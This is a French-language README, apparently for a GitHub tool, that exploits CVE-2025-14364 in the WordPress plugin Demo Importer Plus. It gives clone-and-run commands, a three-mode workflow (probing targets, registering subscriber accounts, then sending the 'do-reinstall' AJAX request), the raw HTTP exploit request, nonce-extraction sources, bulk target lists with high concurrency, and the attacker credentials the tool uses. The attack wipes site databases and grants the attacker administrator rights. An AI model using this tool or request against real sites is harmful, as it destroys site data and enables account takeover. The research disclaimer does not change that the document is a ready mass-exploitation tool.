
Demo Importer Plus <= 2.0.8 - Absence d'autorisation pour les utilisateurs authentifiés (niveau Abonné+) permettant la réinitialisation du site et l'escalade de privilèges
Demo Importer Plus <= 2.0.8 - Absence d'autorisation menant à une réinitialisation complète du site et à une escalade de privilèges (Abonné+)
_ _ _ _ _ _ _ _
/ \ / |_ __ ) / \ ) |_ __ /| |_|_ _) |_ |_|_
\_ \/ |_ /_ \_/ /_ _) | | _) |_) |
Abonné authentifié → Administrateur via l'action AJAX
do-reinstall
Cause racine :
Ajax::handle_request() enregistre l'action AJAX demo_importer_plus sans appeler current_user_can(). Tout abonné authentifié peut envoyer {"demo_action":"do-reinstall"} pour déclencher wp_install(), qui supprime toutes les tables de la base de données (sauf users / usermeta) et relance la configuration de WordPress — attribuant automatiquement le rôle Administrateur au compte attaquant dans le processus.
Mode 1 — Diagnostic
Sondage : DNS · /wp-login.php · /wp-admin/admin-ajax.php · REST /wp/v2/users
→ Identifier les sites WordPress actifs
Mode 2 — Inscription
POST /wp-login.php?action=register
→ Créer un compte abonné
→ Email d'activation envoyé dans la boîte de réception
↳ Vous DEVEZ cliquer sur le lien de l'email avant d'exécuter le Mode 3
Mode 3 — Exploitation
POST /wp-login.php → Authentification en tant qu'abonné
GET /wp-admin/ → Extraire le wp-rest-nonce
POST /wp-admin/admin-ajax.php
action=demo_importer_plus
{"demo_action":"do-reinstall"} → Déclencher la réinitialisation complète du site
← Réponse : "Site has been reset successfully"
→ Le compte attaquant détient désormais le rôle Administrateur
git clone https://github.com/Nxploited/CVE-2025-14364.git
cd CVE-2025-14364
pip install -r requirements.txt
python3 CVE-2025-14364.py
requirements.txt
aiohttp>=3.9.0
colorama>=0.4.6
urllib3>=1.26.0
Mode [1/2/3] : 1 = Diagnostic 2 = Inscription 3 = Exploitation
Fichier cibles : list.txt (une cible par ligne)
Concurrence : par défaut 30, max 200
Délai d'attente : par défaut 10s
Format des cibles — list.txt :
https://cible1.com
cible2.com
http://cible3.com
Sonde quatre points de terminaison par cible et écrit les résultats propres.
Mode: 1
Sortie → diagnostics_results.txt · passed_targets.txt
Mode: 2
Email : [email protected]
Nom d'utilisateur : Nxploited
Mot de passe : NxploitedSA
Vérifiez votre boîte de réception et cliquez sur le lien d'activation avant d'exécuter le Mode 3.
Sortie → register_results.txt
Mode: 3
Nom d'utilisateur : Nxploited
Mot de passe : NxploitedSA
En cas de succès, l'outil affiche :
[HH:MM:SS] SUCCÈS "success":true,"message":"Site has been reset successfully" -> https://cible.com
Et écrit dans exploit_results.txt :
https://cible.com/wp-login.php site:... user:Nxploited pass:NxploitedSA type:admin
Requête vulnérable :
POST /wp-admin/admin-ajax.php?action=demo_importer_plus HTTP/1.1
Content-Type: application/json
X-WP-Nonce: <nonce_extrait>
{"demo_action":"do-reinstall"}
Réponse réussie :
{"success": true, "data": {"message": "Site has been reset successfully"}}
Extraction du nonce — deux sources de repli :
wpApiSettings.nonce (depuis le code source de la page /wp-admin/)
elementorOneSettingsData.wpRestNonce (repli)
Par : Nxploited (Khaled Alenazi)
GitHub : https://github.com/Nxploited
Telegram : @KNxploited
CE LOGICIEL EST PUBLIÉ STRICTEMENT À DES FINS DE RECHERCHE EN SÉCURITÉ ET D'ÉDUCATION.
L'auteur décline toute responsabilité quant aux actions entreprises avec cet outil
contre des systèmes que l'opérateur ne possède pas ou pour lesquels il n'a pas
d'autorisation écrite explicite de test.
Toute utilisation non autorisée contre des systèmes tiers viole les lois sur les
délits informatiques dans la plupart des juridictions (CFAA, CMA et équivalents
dans le monde entier) et peut entraîner des poursuites pénales.
Vous êtes seul responsable de vous assurer que vous disposez d'une autorisation
légale avant d'exécuter cet outil contre une cible quelconque.
| CVE | CVE-2025-14364 |
| CVSS v3.1 | 8.8 ÉLEVÉ — CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| CNA | Wordfence |
| Plugin | Demo Importer Plus |
| Versions affectées | Toutes les versions ≤ 2.0.8 |
| Authentification requise | Abonné (rôle enregistré le plus bas) |
| Type | Absence de vérification de capacité → Réinitialisation complète du site → Escalade de privilèges |
| CWE | CWE-862 · Absence d'autorisation |
| Fichier | Contenu |
|---|
diagnostics_results.txt | JSON complet du sondage par cible |
passed_targets.txt | Cibles propres (aucune erreur détectée) |
register_results.txt | Enregistrements des tentatives d'inscription |
exploit_results.txt | Connexion · nonce · résultats de réinitialisation · hits administrateur confirmés |
reset_results.txt | Réponse brute do-reinstall par cible |